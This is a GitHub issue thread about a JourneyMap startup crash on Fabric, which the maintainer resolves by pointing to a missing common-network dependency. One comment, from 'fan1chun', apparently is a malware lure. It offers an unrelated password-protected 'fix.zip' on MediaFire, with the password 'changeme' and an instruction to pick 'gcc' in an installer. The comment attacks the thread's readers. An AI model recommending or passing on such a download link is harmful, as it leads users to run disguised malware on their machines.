### ISSUE TITLE
[Crash]: Crash on startup

### ISSUE THREAD

**Issue by TQCnoARosto** [TeamJM/journeymap#779]
### What happened?

A crash happened!

### Mod Loader

Fabric

### Minecraft Version

1.21.x

### Version

6.0.0

### Relevant log output

https://pastebin.com/6Pb6uHta

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mysticdrew** [comment]
https://www.curseforge.com/minecraft/mc-mods/common-network/files/5672332

**Comment by TQCnoARosto** [comment]
I had never installed it. I hadn't seen the dependency, mb

**Comment by mysticdrew** [comment]
It should have been packed in journeymap. But another mod packaged a lower version and fabric should have used the higher version but did not for some reason
